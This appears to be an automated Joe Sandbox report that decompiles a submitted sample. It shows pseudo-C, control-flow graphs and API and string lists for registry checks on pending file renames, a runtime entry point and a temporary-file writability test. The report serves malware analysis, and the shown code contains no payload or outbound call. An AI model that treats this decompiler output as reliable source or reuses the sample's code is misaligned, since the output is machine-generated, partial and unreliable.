                                                                                                                                                                                                        control_flow_graph 563 e8256d-e8257d 564 e82622-e82627 call e824e0 563->564 565 e82583-e82589 563->565 572 e82629-e8262f 564->572 567 e825e8-e82607 RegOpenKeyExA 565->567 568 e8258b 565->568 569 e82609-e82620 RegQueryInfoKeyA 567->569 570 e825e3-e825e6 567->570 568->572 573 e82591-e82595 568->573 575 e825d1-e825dd RegCloseKey 569->575 570->572 573->572 574 e8259b-e825ba RegOpenKeyExA 573->574 574->570 576 e825bc-e825cb RegQueryValueExA 574->576 575->570 576->575
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00E8256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E00E824E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00e82572
                                                                                                                                                                                                        0x00e82573
                                                                                                                                                                                                        0x00e82575
                                                                                                                                                                                                        0x00e82578
                                                                                                                                                                                                        0x00e8257d
                                                                                                                                                                                                        0x00e82627
                                                                                                                                                                                                        0x00e82583
                                                                                                                                                                                                        0x00e82586
                                                                                                                                                                                                        0x00e82589
                                                                                                                                                                                                        0x00e825eb
                                                                                                                                                                                                        0x00e82607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82609
                                                                                                                                                                                                        0x00e8261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8258b
                                                                                                                                                                                                        0x00e8258b
                                                                                                                                                                                                        0x00e8259e
                                                                                                                                                                                                        0x00e825b2
                                                                                                                                                                                                        0x00e825ba
                                                                                                                                                                                                        0x00e825cb
                                                                                                                                                                                                        0x00e825d1
                                                                                                                                                                                                        0x00e825d6
                                                                                                                                                                                                        0x00e825da
                                                                                                                                                                                                        0x00e825dd
                                                                                                                                                                                                        0x00e825dd
                                                                                                                                                                                                        0x00e825e3
                                                                                                                                                                                                        0x00e825e3
                                                                                                                                                                                                        0x00e825e3
                                                                                                                                                                                                        0x00e8258b
                                                                                                                                                                                                        0x00e82589
                                                                                                                                                                                                        0x00e8262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00E84096,00E84096,?,00E81ED3,00000001,00000000,?,?,00E84137,?), ref: 00E825B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00E84096,?,00E81ED3,00000001,00000000,?,?,00E84137,?,00E84096), ref: 00E825CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00E81ED3,00000001,00000000,?,?,00E84137,?,00E84096), ref: 00E825DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00E84096,00E84096,?,00E81ED3,00000001,00000000,?,?,00E84137,?), ref: 00E825FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00E84096,00000000,00000000,00000000,00000000,?,00E81ED3,00000001,00000000), ref: 00E8261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00E825C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00E825F5
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00E825A8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 0254a8578825ef85b351ba25929bff5bbcf0db34b4df128e042095c58e5742d9
                                                                                                                                                                                                        • Instruction ID: bb767da1dd4afd48b96ff169f88fbbcdfe45234a9e131cfcbfe11a7854f61235
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0254a8578825ef85b351ba25929bff5bbcf0db34b4df128e042095c58e5742d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118635942228FFEB20AB929C09DFB7FBCDF017A5F545069B90CB2010D6304E48E7A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 e86a60-e86a91 call e87155 call e87208 GetStartupInfoW 583 e86a93-e86aa2 577->583 584 e86abc-e86abe 583->584 585 e86aa4-e86aa6 583->585 588 e86abf-e86ac5 584->588 586 e86aa8-e86aad 585->586 587 e86aaf-e86aba Sleep 585->587 586->588 587->583 589 e86ad1-e86ad7 588->589 590 e86ac7-e86acf _amsg_exit 588->590 592 e86ad9-e86ae9 call e86c3f 589->592 593 e86b05 589->593 591 e86b0b-e86b11 590->591 595 e86b2e-e86b30 591->595 596 e86b13-e86b24 _initterm 591->596 599 e86aee-e86af2 592->599 593->591 597 e86b3b-e86b42 595->597 598 e86b32-e86b39 595->598 596->595 600 e86b44-e86b51 call e87060 597->600 601 e86b67-e86b71 597->601 598->597 599->591 602 e86af4-e86b00 599->602 600->601 611 e86b53-e86b65 600->611 604 e86b74-e86b79 601->604 605 e86c39-e86c3e call e8724d 602->605 608 e86b7b-e86b7d 604->608 609 e86bc5-e86bc8 604->609 614 e86b7f-e86b81 608->614 615 e86b94-e86b98 608->615 612 e86bca-e86bd3 609->612 613 e86bd6-e86be3 _ismbblead 609->613 611->601 612->613 618 e86be9-e86bed 613->618 619 e86be5-e86be6 613->619 614->609 620 e86b83-e86b85 614->620 616 e86b9a-e86b9e 615->616 617 e86ba0-e86ba2 615->617 621 e86ba3-e86bbc call e82bfb 616->621 617->621 618->604 619->618 620->615 623 e86b87-e86b8a 620->623 627 e86c1e-e86c25 621->627 628 e86bbe-e86bbf exit 621->628 623->615 625 e86b8c-e86b92 623->625 625->620 629 e86c32 627->629 630 e86c27-e86c2d _cexit 627->630 628->609 629->605 630->629
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00E87155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xe872b8);
                                                                                                                                                                                                        				E00E87208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xe888b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xe888b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xe881e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xe888b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00E86C3F(0xe810b8, 0xe810c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00E86FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xe888b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xe810b4);
                                                                                                                                                                                                        							_push(0xe810ac);
                                                                                                                                                                                                        							L00E87202();
                                                                                                                                                                                                        							 *0xe888b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xe888ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xe888b4;
                                                                                                                                                                                                        						if( *0xe888b4 != 0 && E00E87060(_t71, 0xe888b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xe888b4; // 0x0
                                                                                                                                                                                                        							 *0xe8a288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00E82BFB(0xe80000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xe881e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xe881f8;
                                                                                                                                                                                                        							if( *0xe881f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xe881e4;
                                                                                                                                                                                                        							if( *0xe881e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xe881e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E00E8724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e86a60
                                                                                                                                                                                                        0x00e86a6a
                                                                                                                                                                                                        0x00e86a6c
                                                                                                                                                                                                        0x00e86a71
                                                                                                                                                                                                        0x00e86a78
                                                                                                                                                                                                        0x00e86a7f
                                                                                                                                                                                                        0x00e86a85
                                                                                                                                                                                                        0x00e86a8e
                                                                                                                                                                                                        0x00e86a91
                                                                                                                                                                                                        0x00e86a93
                                                                                                                                                                                                        0x00e86a9c
                                                                                                                                                                                                        0x00e86aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86aa6
                                                                                                                                                                                                        0x00e86ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86aa8
                                                                                                                                                                                                        0x00e86aaa
                                                                                                                                                                                                        0x00e86aab
                                                                                                                                                                                                        0x00e86aab
                                                                                                                                                                                                        0x00e86abf
                                                                                                                                                                                                        0x00e86abf
                                                                                                                                                                                                        0x00e86ac5
                                                                                                                                                                                                        0x00e86ad1
                                                                                                                                                                                                        0x00e86ad7
                                                                                                                                                                                                        0x00e86b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86ad9
                                                                                                                                                                                                        0x00e86ad9
                                                                                                                                                                                                        0x00e86ae9
                                                                                                                                                                                                        0x00e86af0
                                                                                                                                                                                                        0x00e86af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86af4
                                                                                                                                                                                                        0x00e86af4
                                                                                                                                                                                                        0x00e86afb
                                                                                                                                                                                                        0x00e86afb
                                                                                                                                                                                                        0x00e86af2
                                                                                                                                                                                                        0x00e86ac7
                                                                                                                                                                                                        0x00e86ac7
                                                                                                                                                                                                        0x00e86ac9
                                                                                                                                                                                                        0x00e86b0b
                                                                                                                                                                                                        0x00e86b0b
                                                                                                                                                                                                        0x00e86b11
                                                                                                                                                                                                        0x00e86b13
                                                                                                                                                                                                        0x00e86b18
                                                                                                                                                                                                        0x00e86b1d
                                                                                                                                                                                                        0x00e86b24
                                                                                                                                                                                                        0x00e86b24
                                                                                                                                                                                                        0x00e86b30
                                                                                                                                                                                                        0x00e86b39
                                                                                                                                                                                                        0x00e86b39
                                                                                                                                                                                                        0x00e86b3b
                                                                                                                                                                                                        0x00e86b42
                                                                                                                                                                                                        0x00e86b57
                                                                                                                                                                                                        0x00e86b5f
                                                                                                                                                                                                        0x00e86b65
                                                                                                                                                                                                        0x00e86b65
                                                                                                                                                                                                        0x00e86b67
                                                                                                                                                                                                        0x00e86b6c
                                                                                                                                                                                                        0x00e86b6e
                                                                                                                                                                                                        0x00e86b71
                                                                                                                                                                                                        0x00e86b74
                                                                                                                                                                                                        0x00e86b74
                                                                                                                                                                                                        0x00e86b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86b7d
                                                                                                                                                                                                        0x00e86b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86b83
                                                                                                                                                                                                        0x00e86b8c
                                                                                                                                                                                                        0x00e86b8d
                                                                                                                                                                                                        0x00e86b90
                                                                                                                                                                                                        0x00e86b90
                                                                                                                                                                                                        0x00e86b83
                                                                                                                                                                                                        0x00e86b81
                                                                                                                                                                                                        0x00e86b94
                                                                                                                                                                                                        0x00e86b98
                                                                                                                                                                                                        0x00e86ba2
                                                                                                                                                                                                        0x00e86b9a
                                                                                                                                                                                                        0x00e86b9a
                                                                                                                                                                                                        0x00e86b9a
                                                                                                                                                                                                        0x00e86ba3
                                                                                                                                                                                                        0x00e86bab
                                                                                                                                                                                                        0x00e86bb0
                                                                                                                                                                                                        0x00e86bb5
                                                                                                                                                                                                        0x00e86bbc
                                                                                                                                                                                                        0x00e86bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86bbf
                                                                                                                                                                                                        0x00e86c1e
                                                                                                                                                                                                        0x00e86c25
                                                                                                                                                                                                        0x00e86c27
                                                                                                                                                                                                        0x00e86c2d
                                                                                                                                                                                                        0x00e86c2d
                                                                                                                                                                                                        0x00e86c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86bc5
                                                                                                                                                                                                        0x00e86bc5
                                                                                                                                                                                                        0x00e86bc8
                                                                                                                                                                                                        0x00e86bcc
                                                                                                                                                                                                        0x00e86bce
                                                                                                                                                                                                        0x00e86bce
                                                                                                                                                                                                        0x00e86bd1
                                                                                                                                                                                                        0x00e86bd3
                                                                                                                                                                                                        0x00e86bd3
                                                                                                                                                                                                        0x00e86bd6
                                                                                                                                                                                                        0x00e86bda
                                                                                                                                                                                                        0x00e86be1
                                                                                                                                                                                                        0x00e86be3
                                                                                                                                                                                                        0x00e86be5
                                                                                                                                                                                                        0x00e86be5
                                                                                                                                                                                                        0x00e86be6
                                                                                                                                                                                                        0x00e86be6
                                                                                                                                                                                                        0x00e86be9
                                                                                                                                                                                                        0x00e86bea
                                                                                                                                                                                                        0x00e86bea
                                                                                                                                                                                                        0x00e86b74
                                                                                                                                                                                                        0x00e86c39
                                                                                                                                                                                                        0x00e86c3e
                                                                                                                                                                                                        0x00e86c3e
                                                                                                                                                                                                        0x00e86abe
                                                                                                                                                                                                        0x00e86abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E87182
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetCurrentProcessId.KERNEL32 ref: 00E87191
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetCurrentThreadId.KERNEL32 ref: 00E8719A
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetTickCount.KERNEL32 ref: 00E871A3
                                                                                                                                                                                                          • Part of subcall function 00E87155: QueryPerformanceCounter.KERNEL32(?), ref: 00E871B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00E872B8,00000058), ref: 00E86A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00E86AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00E86AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00E86B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00E86B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00E86BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00E86BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 162b4df70c2394242876d4c37512d87094823a819d4d4faccc4f12ece01fecae
                                                                                                                                                                                                        • Instruction ID: 3ea3d7a79c632b017dc4fafc7ce3e674905a60f334d0060eaeee25a8fde97116
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 162b4df70c2394242876d4c37512d87094823a819d4d4faccc4f12ece01fecae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55411570944324CFDB25BB65DD097AA77E4EB44728FA4212AE84DF32A0CF708C458B81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 e858c8-e858d5 632 e858d8-e858dd 631->632 632->632 633 e858df-e858f1 LocalAlloc 632->633 634 e85919-e85959 call e81680 call e8658a CreateFileA LocalFree 633->634 635 e858f3-e85901 call e844b9 633->635 638 e85906-e85910 call e86285 634->638 644 e8595b-e8596c CloseHandle GetFileAttributesA 634->644 635->638 645 e85912-e85918 638->645 644->638 646 e8596e-e85970 644->646 646->638 647 e85972-e8597b 646->647 647->645
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00E858C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00E81680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E00E8658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x00e858cd
                                                                                                                                                                                                        0x00e858d1
                                                                                                                                                                                                        0x00e858d3
                                                                                                                                                                                                        0x00e858d5
                                                                                                                                                                                                        0x00e858d8
                                                                                                                                                                                                        0x00e858d8
                                                                                                                                                                                                        0x00e858da
                                                                                                                                                                                                        0x00e858db
                                                                                                                                                                                                        0x00e858e1
                                                                                                                                                                                                        0x00e858ed
                                                                                                                                                                                                        0x00e858f1
                                                                                                                                                                                                        0x00e8591e
                                                                                                                                                                                                        0x00e8592c
                                                                                                                                                                                                        0x00e85943
                                                                                                                                                                                                        0x00e8594a
                                                                                                                                                                                                        0x00e8594d
                                                                                                                                                                                                        0x00e85953
                                                                                                                                                                                                        0x00e85959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8595b
                                                                                                                                                                                                        0x00e8595c
                                                                                                                                                                                                        0x00e85963
                                                                                                                                                                                                        0x00e8596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85972
                                                                                                                                                                                                        0x00e85974
                                                                                                                                                                                                        0x00e8597a
                                                                                                                                                                                                        0x00e8597a
                                                                                                                                                                                                        0x00e8596c
                                                                                                                                                                                                        0x00e858f3
                                                                                                                                                                                                        0x00e85901
                                                                                                                                                                                                        0x00e85906
                                                                                                                                                                                                        0x00e8590b
